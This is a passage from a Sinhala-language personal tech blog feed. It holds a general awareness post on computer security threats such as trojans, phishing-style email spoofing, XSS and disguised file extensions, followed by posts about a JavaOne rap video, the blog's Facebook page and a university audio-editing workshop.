ගැන කතා කරමු.</div><div><ul><li><b>සොරකම් කිරීම</b>: මේ කියන්නෙ අන්තර්ජාලය හරහා කරන හොරකම් නෙමෙයි. ඇත්ත ලෝකේ භෞතිකව වෙන හොරකම් ගැන. </li><li><b>විදුලි දෝශ</b>: විදුලිය ඇන හිටීම, එකවර විශාල විදුලි ධාරිතාවයක් පැමිණීම, විදුලිය නිසි ධාරිතාවයට වඩා අඩුවෙන් (ඩිම්) පැමිණිම වැනි හේතු නිසා පරිඝනක පද්ධතියේ ඉලෙක්ට්රොනික උපාංග වලට හානි සිදු වෙන්න පුළුවන්.</li><li><b>ඩිස්ක් ඇන හිටීම (Disk Failure)</b>: විවිද හේතු නිසා දත්ත ගබඩා කරල තියෙන හාර්ඩ් ඩිස්ක් වැඩ කරන්නෙ නැතුව යන්න පුළුවන්. මේ විදිහට ඩිස්ක් වැඩ කරන්නෙ නැතුව යන එකෙන් දත්ත නැති වීම නිතරම දකින්න පුලුවන් දෙයක්.</li></ul><div>දැන් අපි බලමු අන්තර්ජාලය හරහා පිටස්තර ප්රහාරකයෙක්ට ඔබේ පරිඝනකයට සිදු කරන්න පුලුවන් ප්රහාර හා අනතුරු ගැන. </div></div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpkI_g4R3qpkD-eCtPGc2B-OleSQzLuLXQM3Kcd0XYW1_ejxVSfu-GLB6fKUxfUOIrH5uTQW7evidMk_ZpcvhOVRumImGgbFdbgyRNagDjHL0TTVUjC0mas0newcfesPfLt28V_ocrzBk/s1600/hacker2.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpkI_g4R3qpkD-eCtPGc2B-OleSQzLuLXQM3Kcd0XYW1_ejxVSfu-GLB6fKUxfUOIrH5uTQW7evidMk_ZpcvhOVRumImGgbFdbgyRNagDjHL0TTVUjC0mas0newcfesPfLt28V_ocrzBk/s400/hacker2.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5662959465177019554" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 298px; height: 320px; " /></a></div><div><ul><li><b>ට්රෝජන් අශ්වයන් භාවිත කිරීම</b>: මම මේ ගැන වෙනම ලිපියක් ලියල තියෙනවා. ඒ ලිපිය <a href="http://compdiary.blogspot.com/2011/10/blog-post.html">මෙතනින් </a>ගිහින් කියවන්න පුලුවන්. ඒ විතරක් නෙමෙයි ට්රෝජන් අශ්වයෙක් වෙන පරිඝනකයකට යවන ආකාරය ගැන ලියපු ලිපිය <a href="http://compdiary.blogspot.com/2011/10/blog-post_01.html">මෙතනින් </a>ගිහින් කියවන්න.</li><li><b>Packet Sniffing</b>: පරිඝනක ජාල (Network) හරහා දත්ත හුවමාරු වෙන්නෙ Data Packet විදිහට. මේ විදිහට පැකට් විදිහට ජාල හරහා හුවමාරු වෙන තොරතුරු ග්රහණය කරන එක තමයි වෙන්නෙ පැකට් ස්නිෆිං වලදි. මේ සඳහා ගොඩක් වෙලාවට Packet Sniffers කියන වැඩසටහන් වර්ගය තමයි භාවිත වෙන්නෙ. මේ විදිහට පාස්වර්ඩ් වගේ සංවේදී දත්ත සොරකමට ලක් වෙන්න පුලුවන්.</li><li><b>චැට් හරහා (Chat Clients)</b>: අන්තර්ජාලය තුල පණිවුඩ හුවමාරු කර ගන්න විවිධ චැට් මෘදුකාංග හා වෙබ් අඩවි භාවිත කරනවා. මේ සමහර චැට් හරහා executable codes හුවමාරු කරන්න පුලුවන් නිසා පරිඝනකයට හරහා ප්රහාර එල්ල වෙන්න පුළුවන්.</li><li><b>පෑල දොරවල් හා දුරස්ත පරිපාලන වැඩසටහන් (Back Doors and Remote Administration Programs)</b>: වින්ඩෝස් මෙහෙයුම් පද්ධතිය ක්රියාත්මක වන පරිඝනක විශාල වශයෙන් මේ ආකාරයේ උවදුරු වලට ලක් වෙනවා. මේ වැඩසටහන් උපයෝගයෙන් පිටස්තරයෙක්ට පුලුවන් ඔබේ පරිඝනකයට අන්තර්ජාලය හරහා වෙනත් ස්ථානයක සිට ඇතුල්වන්න සහ පාලනය කරන්න.</li><li><b>Denial of Service : </b>මෙය එක් ආකාරයක හැකර් ප්රහාරයක්. DoS හෙවත් Denial of Service ලෙස මේක හැදින්වෙනවා. මේකෙන් ඔබේ පරිඝනකය ක්රියා විරහිත කරන්න හෝ වෙනත් දත්ත Process කිරීම තුල කාර්ය බහුල කරන්න පුලුවන්. මෙයින් සිදු වන්නෙ ඔබට ඔබේ පරිඝනකය එම ප්රහාරය පවතින තාක් භාවිත කරන්න නොහැකි වීමයි.</li><li><b>වෙනත් පරිඝනකයකට එල්ල වෙන ප්රහාරයකට අතරමැදියෙකු විදිහට ඔබව භාවිත වීම</b>: මේ ආකාරයේ ප්රහාරයකට කියන්නෙ DDoS හෙවත් Distributed Denail of Service කියල. මේ ඩීඩොස් වැඩසටහන් පාවිච්චි කරල ඔබේ පරිඝනකය බළල් අතක් විදිහට වෙනත් අකටයුත්තක් සඳහා හැකර්ලා පාවිච්චි කරන්න පුලුවන්.</li><li><b>අනාරක්ෂිත Windows Shares</b>: ඔබේ පරිඝනකයේ තිබෙන අනාරක්ෂිත Sheres ප්රහාරකයෙකුට තමන්ගේ Worms, Bots, Viruses වගේ වැඩසටහන් ස්තාපනය කරන්න ඉඩකඩ සලසනවා.</li><li><b>Mobile Codes (Java, JavaScript, ActiveX)</b>: පරිඝනකයේ ස්ථාපනය කරන විවිධ ආකාරයේ Mobile Codes නිසා පරිඝනකයක ආරක්ෂාවට ප්රශ්න ඇති වෙන්න පුළුවන්. මේ Programming Language නිසා වෙබ් අඩවි ගොඩනගන්නන්ට පුලුවන් විවිධ කේත (Codes) ලියා ඒවා ඔබේ බ්රව්සරය (Browser) තුල ක්රියාත්මක (Execute) කරවන්න පුළුවන්. මේ විදිහට බහුලව පාවිච්චි වෙන Mobile Codes තමයි Java, JavaScript, ActiveX යන ඒවා. මේවා වෙබ් අඩවි ගොඩනගන්නන්ට වගේම හැකර් කෙනෙකුටත් පුලුවන් ඔබේ පරිඝනකයේ තොරතුරු එකතු කරන්න හා වෙනත් හානි කර කේතයක් ක්රියාත්මක කරන්න.</li><li><b>Cross-Site Scripting</b>: මෙහිදී සිදු වන්නේ යම් ප්රහාරකයෙකු විසින් වෙබ් අඩවියකට කුමක් හෝ Script එකක් අමුණා යැවීමයි. ඉන් පසු යම් අවස්ථාවක ඒ වෙබ් අඩවිය ඔබට ප්රතිචාර දක්වනකොට අදාල හානිකර Script එකත් ඔබේ බ්රව්සරය හරහා පරිඝනකයට පැමිණීමයි. මෙවැනි වලට පරිඝනකයක් නිරාවරණය වන ආකාර ප්රධාන වශයෙන්, අවිශ්වාස කටයුතු වෙබ් අඩවි වල ෆෝරම් හා චැට් වලට සම්බන්ද වීම, ලින්ක් එකක් ඔබව ගෙනියන්නේ කොහේටද නොදැන ඒවා භාවිත කිරීම වැනි ආකාර හඳුන්වන්න පුලුවන්.</li><li><b>Email Spoofing</b>: මෙහිදී සිදු වන්නේ ඔබට යම් වෙබ් අඩවියකින් යැයි පෙන්වමින් Email එකක් එවනවා. නමුත් එය ඔබව ගෙනි යන්නේ ඔවුන් පෙන්වා දෙන අඩවියට නෙමෙයි. උදාහරණයක් විදිහට ඔබට බැංකුවේ වෙබ් අඩවියෙන් ලෙස පෙන්වා දෙමින් ඊමේල් එකක් එනවා ඔබ බැංකුවේ වෙබ් අඩවියට යාමට එය භාවිතා කරනවා නමුත් ඔබ යන්නේ ප්රහාරකයා විසින් නිර්මාණය කළ වෙනත් අඩවියකට. මෙය ප්රධාන වශයෙන් පාස්වර්ඩ් වැනි දේ සොරකම් කරන්න භාවිත වෙනවා.</li><li><b>Email-Borne Viruses</b>: මේවා තමයි ඊමේල් ඇමිණුම් (Attachments) විදිහට පැමිණෙන හානිකර කේත (Malicious Code). මෙවන් ඊමේලක ඇමිණුම විවෘත කරපු ගමන්ම අදාල හානිකර කේතය පරිඝනකය තුල ක්රියාත්මක වෙනවා.</li><li><b style="font-weight: bold; ">Hidden File Extensions</b><b>: වින්ඩෝස් මෙහෙයුම් පද්ධති වල Option එකක් තියෙනවා Hidden File Extensions for Known File Types සඳහා. මේ Option එක සාමාන්යයෙන් ක්රියාත්මක වෙලා තමයි තියෙන්නෙ. මේවාත් වැඩි වශයෙන් ඊමේල් ඇමිණුම් විදිහට තමයි පැමිණෙන්නෙ. විවිද අනාරක්ශිත වෙබ් අඩවි වලින් බාගත කර ගන්න වීඩියෝ, ඕඩියෝ (Video/Audio) ගොනු වලත් මේ වගේ Hidden File Extensions තියෙන්න පුලුවන්. මෙයට උදාහරණ විදිහට,</b></li></ul><ol><li>Downloader (MySis.avi.exe or QuickFlick.mpg.exe)</li><li>VBS/Timofonica (TIMOFONICA.TXT.vbs)</li><li>VBS/CoolNote (COOL_NOTEPAD_DEMO.TXT.vbs)</li><li>VBS/OnTheFly (AnnaKournikova.jpg.vbs)</li></ol><div>මේ ආකාරයෙන් විවිධ ආකාරයේ සතුරු උවදුරු හා අනතුරු පරිඝනකයට එල්ල වෙන්න පුලුවන්. මේ විවිද වූ අනතුරු හා උවදුරු වලින් පරිඝනකය හා ඔබේ තොරතුරු ආරක්ශා කර ගන්න ගත යුතු ක්රියා මාර්ග ගැන වෙනත් ලිපියකින් ලියන්නම්. </div></div>Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com0tag:blogger.com,1999:blog-7802132138133841506.post-51217713739047240672011-10-12T11:22:00.000-07:002011-10-12T11:24:33.340-07:00The "Java Life" Rap Music Video<div><span class="Apple-style-span" style="background-color: rgb(255, 255, 255); "><span class="Apple-style-span" ><span class="Apple-style-span" style="line-height: 18px;">I found this awesome music video form a friends facebook wall. </span></span></span></div><span class="Apple-style-span" style="font-family: arial, sans-serif; font-size: 13px; line-height: 18px; background-color: rgb(255, 255, 255); "><div><span class="Apple-style-span" style="font-family: arial, sans-serif; font-size: 13px; line-height: 18px; background-color: rgb(255, 255, 255); "><br /></span></div></span><span class="Apple-style-span" style="font-family: arial, sans-serif; line-height: 18px; font-size: small; "><iframe width="560" height="315" src="http://www.youtube.com/embed/b-Cr0EWwaTk" frameborder="0" allowfullscreen=""></iframe></span><span class="Apple-style-span" style="font-family: arial, sans-serif; font-size: 13px; line-height: 18px; background-color: rgb(255, 255, 255); "><div><span class="Apple-style-span" style="font-family: arial, sans-serif; font-size: 13px; line-height: 18px; background-color: rgb(255, 255, 255); "><br /></span></div>This original rap music video made for JavaOne 2011 celebrates the "Java Life". Dedicated to the developer homies everywhere who code hard day and night. Think Java programmers meet street Hip Hop.</span>Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com2tag:blogger.com,1999:blog-7802132138133841506.post-89888939282360665702011-10-12T10:22:00.000-07:002011-10-12T10:31:10.537-07:00Facebook Page for the Blog - බ්ලොගයේ මූණු පොතේ පිටුව<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk-cY5yut7eIUoav41hdiRpPbgbl6fE_6phaAHX1UUZl9ykfMo1jtco7CMZrHp5fKwBtnxHQ7-_tdpfCpCPJTSSCYQX7ra-zVfnKPSLsaLayRQlCxvDgUN_1BgcJ6XdEQcwIyGPe8sq5Q/s1600/Finding-the-Best-IT-Support-New-York-Services.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 263px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk-cY5yut7eIUoav41hdiRpPbgbl6fE_6phaAHX1UUZl9ykfMo1jtco7CMZrHp5fKwBtnxHQ7-_tdpfCpCPJTSSCYQX7ra-zVfnKPSLsaLayRQlCxvDgUN_1BgcJ6XdEQcwIyGPe8sq5Q/s400/Finding-the-Best-IT-Support-New-York-Services.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5662659487474932674" /></a><br />I just Created a Facebook Page for this blog. Anyone can use this page to make discussions on IT related topics or ask for help or information. You can see it on the right side of the blog. And you can go the the page from <a href="http://www.facebook.com/pages/Once-upon-a-time-with-a-Computer/151098844986359">here</a>. <div><br /></div><div>මම මේ බ්ලොග් එකට මූණු පොතේ පිටුවක් නිර්මාණය කළා. මේ පිටුව අවශ්ය ඕනෑම කෙනෙකුට IT සම්බන්ඳ මාතෘකාවක් සාකච්චා කරන්න හෝ ඒ සම්බන්ඳ උදව්වක් හෝ තොරතුරක් ඉල්ලන්න පාවිච්චි කරන්න පුළුවන්. මේ පිටුව බ්ලොග් එකේ දකුණු පස තීරුවේ තමයි තියෙන්නෙ. මේ පිටුවට <a href="http://www.facebook.com/pages/Once-upon-a-time-with-a-Computer/151098844986359">මෙතනින් </a>යන්නත් පුළුවන්.</div><div><br /></div>Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com0tag:blogger.com,1999:blog-7802132138133841506.post-15130323135929053332011-10-10T10:04:00.000-07:002011-10-10T20:47:08.470-07:00ලස්සන වැඩක් අවසානයේ ඉතිරි වූ සතුට<div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimlrROllEGEE5-c-5EBy-3u-nvw35UjpcerNfsG3aAR2HF_75o5a-2uownzoF-54hE0DCJUosdavWZS9J-xL_197kdkX5XjkU7NY9wCylsrtugROdl6l2QiZKg_Uwm9qo9H4TzJmUUugM/s1600/Media-Competition.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 107px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimlrROllEGEE5-c-5EBy-3u-nvw35UjpcerNfsG3aAR2HF_75o5a-2uownzoF-54hE0DCJUosdavWZS9J-xL_197kdkX5XjkU7NY9wCylsrtugROdl6l2QiZKg_Uwm9qo9H4TzJmUUugM/s400/Media-Competition.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5661923030774760514" /></a></div><br />කොළඹ විශ්ව විද්යාලයේ පරිඝනක අධ්යන ආයතනය (University of Colombo School of Computing) හා ශ්රී ලංකා ගුවන් විදුලි සංස්ථාව එකතු වී පවත්වන පරිඝනක නිර්මාණ තරගාවලියක් (Media Editing Competition) පිළිබඳව මම <a href="http://compdiary.blogspot.com/2011/09/blog-post_30.html">පෙර ලිපියකින්</a> සඳහන් කලා. ඒ හා සමගාමීව <a href="http://www.compsoc.lk/">කොළඹ විශ්ව විද්යාලීය පරිඝනක සංගමය</a> (CompSoc) විසින් ජායාරූප සංස්කරණය (Image Editing) , ශ්රව්ය-දෘශ්ය සංස්කරණය (Video Editing) හා ශ්රව්ය සංස්කරණය (Audio Editing) පිළිබදව දින දෙකක පුරා විශේෂ වැඩමුළු මාලාවක් සංවිධානය කළා. මේ වැඩමුළුවට මටත් කොටස් කාරයෙක් වෙන්න ඉඩ ලැබුනෙ සංජය, අනිල්, මාධව, සශාන් ඇතුළු <a href="http://www.compsoc.lk/">කොළඹ විශ්ව විද්යාලීය පරිඝනක සංග</a><a href="http://www.blogger.com/www.compsoc.lk">මයේ</a> ක්රියාකාරී සොහොයුරන් විසින් ශ්රව්ය සංස්කරණය පිළිබඳ වැඩමුලුවක් හා විශේෂ සැසිවාරයක් (Special Session) පවත්වන්න ඉල්ලීමක් කිරීමත් එක්ක.<div><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieJPZ2B_YkxVa-Qdw1Hic8I0Q6axhrA1TUKSmiFB5tkRC_Sw3BHWWA083t0gdw4Em_KZ9guBoPaFK_dGoadK6Mex_ZEJS6O3StLpXo5zQZOooHK24rbbkfUlmoBG8bmwuRUD63gU4c6sM/s1600/2011-10-04+08.59.18.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieJPZ2B_YkxVa-Qdw1Hic8I0Q6axhrA1TUKSmiFB5tkRC_Sw3BHWWA083t0gdw4Em_KZ9guBoPaFK_dGoadK6Mex_ZEJS6O3StLpXo5zQZOooHK24rbbkfUlmoBG8bmwuRUD63gU4c6sM/s400/2011-10-04+08.59.18.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5661924177970052002" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 300px; " /></a> </div><div>ශ්රව්ය සංස්කරණය පිළිබදව එක් දින වැඩමුළු දෙකක් දින දෙක තුළ පැවැත්වුන අතර පළමු දිනයේ වැඩමුලුව චිත්රපට සඳහා පවා ශ්රව්ය සංස්කරණ අධ්යක්ෂකවරයෙක් ලෙස දායකත්වය සපයා ඇති අපගේ ජ්යේශ්ඨ සහෝදරයෙක් වන උදිත ජයසිංහ සොයුරා විසින් පැවැත්වුවා. මෙදින විශේෂ සැසිවාරය මා විසින් පැවැත්වුවා මෙහිදී මම ශබ්ද තරංග හා ඒවා ඩිජිටල් (Digital) ලෝකයේදී පවතින, වර නැගෙන ආකාර වැනි මූලික සිද්ධාන්ත ගැන හා එක් මෘදුකාංගයක් හදුන්වා දී එහි සිටි අයගෙන් සමහරක් අහඹු ලෙස තෝරාගෙන එතනදීම කුඩා ශ්රව්ය කොටස් නිර්මාණය කරවීමත් සිදුකළා. මේ සඳහා මම නිර්මාණය කරපු පිටු දහයකට ආසන්න ටියුට් එක පිටපත් එකසිය පනහකටත් වඩා විශාල ප්රමාණයක් ඉතාමත් ලස්සනට මුදුණය කරල වෙලාවට ලබා දීපු සහෝදරයන්වත් අනිවාර්යෙන් මතක් කරන්න ඕනි. </div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl9ZDcOoSKJuIVJitDuSemAeUNEiqdJzLQXCNIA99lpHvDPFIbdECbizX0JB0vtLYj3hpo6uibit_Q8YPe2JPpGyfnXee8osYK3W65JBRZBrmP6ehsWHnE5KLQTKR2vCDyMiK4I3QC1_E/s1600/2011-10-05+09.15.22.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl9ZDcOoSKJuIVJitDuSemAeUNEiqdJzLQXCNIA99lpHvDPFIbdECbizX0JB0vtLYj3hpo6uibit_Q8YPe2JPpGyfnXee8osYK3W65JBRZBrmP6ehsWHnE5KLQTKR2vCDyMiK4I3QC1_E/s400/2011-10-05+09.15.22.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5661929347907676226" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 300px; " /></a></div><div><br /></div><div>මෙහි දෙවන දින වැඩමුළුව සම්පූර්ණයෙන්ම කිරීම තමයි අභියෝගය උනේ. උදෑසන පැය තුනක දේශනයක් හා සවස පැය දෙකක ප්රායෝගික සැසිවාරයක් (Practical Session) පත්වන්නට නියම වෙලා තිබුනා. උදෑසන දේශනය පැය තුනම ශ්රව්ය සංස්කරණය ගැන නොකර එයින් පැයක් චත්ර සහෝදරයාට සංගීත රචනය (Music Composing) පිළිබඳව කරන්නට අවස්ථාව ලබාදෙන්නට අප තීරණය කළා. එයින් සහභාගී වූ අයට ශ්රව්ය සංස්කරණයෙන් එහා ගිය දැනුමක් ඉතා කෙටි කාලයක් තුල ලබා දෙන්නට චත්ර සහෝදරයාට හැකි වුනා. මොහුගේ මේ දේශනයට ගිටාරයක් අවශ්ය වුණා. ඒ අවස්ථාවේ මගේ පාසල් මිත්රයෙක් වන යසිත් සහෝදරයා මා සමඟ ගෙදර සිටියා හා ඔහුගේ වසර විස්සකට වඩා පැරණි ඉතාමත් වටිනා ගිටාරය තිබුණා. මම ඉල්ලන්නත් කලියෙන් ඔහු එහි වැදගත්කම වටහාගෙන ගිටාරය ලබා දුන්නා. ඒ ගැන ඔහුට විශේෂයෙන් ස්තුති කරන්නට ඕනි. ඔය ගිටාරය හා ලැප්ටොප් පරිඝනකය එල්ලගෙන උදේ ට්රැෆික් එකේ බයික් එකේ කැම්පස් එකට යන්න මම විඳපු දුක වෙනම ලියන්න තරම් කතාවක්.</div><div><br /></div><div>මේ වැඩමුළුව සඳහා පරිඝනක පනහක් පමණ තිබූ Forth Year Lab වල පරිඝනක වලට අවශ්ය මෘදුකාංග (Software) දැමීම තමයි ඊලඟ අභියෝගය උනේ. අපිට සර්වර් (Servers) සඳහා ඇතුල් වෙන්න අවසර නැති නිසා හැම පරිඝනකයකටම එකින් එක මෘදුකාංග ස්තාපනය (Install) කරන්න උනා. වැඩමුළුවේදී භාවිතා වුන හැම මෘදුකාංගයක් (මෘදුකාංග හයක් පමණ) වගේම හා ගිගා බයිට් හතරටකට (4 GB) ආසන්න ශ්රව්ය කොටස් (Audio Files) ප්රමාණයකුත් හැම පරිඝනකයකටම එකින් එක දාන්න (Copy) උනා. මේකට අපේ ජූනියර් මල්ලිලා නංගිලා හා මගේ බැච් එකේ සහෝදරයො පිරිසක් විශාල මහන්සියක් දැරුවා.</div><div><br /></div><div> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkJuOrx1tyx3JlJpGhod65MtAqctMiGTTvXPEq_oghnWtiUxBTENsfqxYcklNOMEPTChDoPg-gXezbGu5m-lSdrClCVAaNB8QO6mvb7pBhPVpoy5QjSSPj-YHDFa81aHwhcmDCnbiices/s1600/293321_2429006333130_1490734815_32682460_1835905156_n.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkJuOrx1tyx3JlJpGhod65MtAqctMiGTTvXPEq_oghnWtiUxBTENsfqxYcklNOMEPTChDoPg-gXezbGu5m-lSdrClCVAaNB8QO6mvb7pBhPVpoy5QjSSPj-YHDFa81aHwhcmDCnbiices/s400/293321_2429006333130_1490734815_32682460_1835905156_n.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5661929797486409458" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 300px; " /></a></div><div>දෙවන දිනයේ වැඩමුළුවට දුක් විදල ගෙනාපු ගිටාරයත් කරගහගෙන මම ඔඩිටෝරියම් (Auditorium) එකට ගිහින් කටයුතු ලෑස්ති කරනකොට ස්ටීරියෝ (Stereo) ශබ්ද පද්ධතියෙ පැත්තක් වැඩ නෑ. බලනකොට මික්සරයෙ (Mixer) ජැක් (Jack) එකක් ගැලවිලා. ඔන්න ඒකත් හදාගෙන වැඩේට ලෑස්ති උනා.</div><div><br /></div><div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJAaQ9S4P1wTyGPslL3F0HRqtqhtkEI0C3SMqfJWL912vBlJ-ypClZtbOZlIbYn0u96aYAaPhzO5T1BpwafaWKygM4q2jj_BGL3P8dS6dLtERKHUEy4CBtljIA8Rc7hUn0UXfG-RCgBh0/s1600/2011-10-05+08.46.34.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><span class="Apple-style-span" style="color: rgb(0, 0, 0); -webkit-text-decorations-in-effect: none; "></span></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJAaQ9S4P1wTyGPslL3F0HRqtqhtkEI0C3SMqfJWL912vBlJ-ypClZtbOZlIbYn0u96aYAaPhzO5T1BpwafaWKygM4q2jj_BGL3P8dS6dLtERKHUEy4CBtljIA8Rc7hUn0UXfG-RCgBh0/s1600/2011-10-05+08.46.34.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJAaQ9S4P1wTyGPslL3F0HRqtqhtkEI0C3SMqfJWL912vBlJ-ypClZtbOZlIbYn0u96aYAaPhzO5T1BpwafaWKygM4q2jj_BGL3P8dS6dLtERKHUEy4CBtljIA8Rc7hUn0UXfG-RCgBh0/s400/2011-10-05+08.46.34.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5661931454889287986" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 300px; " /></a></div><div>මෙතන සුදු කමිසයක් ඇඳගෙන ඉන්නෙ මම. ඉරි කමිසයක් ඇඳගෙන ඉන්නෙ චත්ර සහෝදරයා.</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc3yRh6FIq_uSJtn-SdBt8NykrYyaTQn4SQIvZcqEca6d440XYviuFAFkDatjw9KDHRBX1zQBMxQZVvWBY7ZnpOyZ3GliVInEwSVVsV7qo5eF6phZSAIzbKJLV-J6lJb7O1fHzvzCnsnU/s1600/2011-10-05+08.47.12.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc3yRh6FIq_uSJtn-SdBt8NykrYyaTQn4SQIvZcqEca6d440XYviuFAFkDatjw9KDHRBX1zQBMxQZVvWBY7ZnpOyZ3GliVInEwSVVsV7qo5eF6phZSAIzbKJLV-J6lJb7O1fHzvzCnsnU/s400/2011-10-05+08.47.12.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5661947450111783554" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 300px; " /></a></div><div><br /></div><div>වැඩමුළුවෙ පළමු පැය දෙක මම දේශනය පැවැත්වූවා. එහිදී ශ්රව්ය සංස්කරණය හැඳින්වීම හා විවිධ මෘදුකාංග භාවිතයෙන් ශ්රව්ය සංස්කරණය සිදුකරන ආකාරය පෙන්වා දුන්නා. එහිදී භාවිත කරපු මෘදුකාංග නම්,</div><div><ol><li> Audacity</li><li>Adobe Audition</li><li>Reason</li><li>WaveLab</li><li>Magix Music Maker</li></ol><div>යන මෘදුකාංග. ඉන්පසු චත්ර සහෝදරයා විසින් පැයක් සංගීත රචනය ගැන Reason හා Nuendo යන මෘදුකාංග භාවිතයෙන් හැඳින්වීමක් කළා. </div></div><div style="text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJAaQ9S4P1wTyGPslL3F0HRqtqhtkEI0C3SMqfJWL912vBlJ-ypClZtbOZlIbYn0u96aYAaPhzO5T1BpwafaWKygM4q2jj_BGL3P8dS6dLtERKHUEy4CBtljIA8Rc7hUn0UXfG-RCgBh0/s1600/2011-10-05+08.46.34.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><span class="Apple-style-span"><br /></span></a></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHzp-eOlZxASUefIBCKU-EF5ZntYtq6KnPC0Pa_OJWlJvVJz-F6bUdkHq8gDc6tz3UqFfjp4twRweMICOAuACWi4dllBKCkYoLYmlEDFlb2moYZclJARgMMAaogIuVCzMFyCbk9PE1SW0/s1600/2011-10-05+09.29.39.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHzp-eOlZxASUefIBCKU-EF5ZntYtq6KnPC0Pa_OJWlJvVJz-F6bUdkHq8gDc6tz3UqFfjp4twRweMICOAuACWi4dllBKCkYoLYmlEDFlb2moYZclJARgMMAaogIuVCzMFyCbk9PE1SW0/s400/2011-10-05+09.29.39.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5661933860027568642" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 300px; " /></a></div><div><br /></div><div>ඉන්පසු බ්රයන් සහෝදරයා විසින් පැය දෙකක් විශේෂ සැසිවාරයක් මූලික සිද්ධාන්ත පිළිබඳව ඉතාමත් රසවත් ආකාරයෙන් සිදුකළා. මෙයින් පසු පැය දෙකක ප්රායෝගික සැසිවාරය පැවැත්වූවා. මෙහිදී ශ්රව්ය සංස්කරණය පිළිබඳ ප්රායෝගිකව දැනුම ලබා දීම හා දේශනයේදී ඉගැන්වූ දේ ප්රායෝගිකව කරන්නට අවස්ථාව ලබා දුන්නා.</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3tCWSZZS_iFjRzss8sRpWjsTlAMAJlAeNwMVzBZccRO07RljzDHmR1nBBD14QxhoUOfZ7pQkUJvDM41hwhRElN7Rq3y40tzOp5X0HiUBVnrUYib5mLts8Vw0havSkbahKyrMiGj9POt8/s1600/302567_2397380369533_1101690728_2773798_468677044_n.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3tCWSZZS_iFjRzss8sRpWjsTlAMAJlAeNwMVzBZccRO07RljzDHmR1nBBD14QxhoUOfZ7pQkUJvDM41hwhRElN7Rq3y40tzOp5X0HiUBVnrUYib5mLts8Vw0havSkbahKyrMiGj9POt8/s400/302567_2397380369533_1101690728_2773798_468677044_n.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5661938165881794626" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 225px; " /></a></div><div><br /></div><div><a 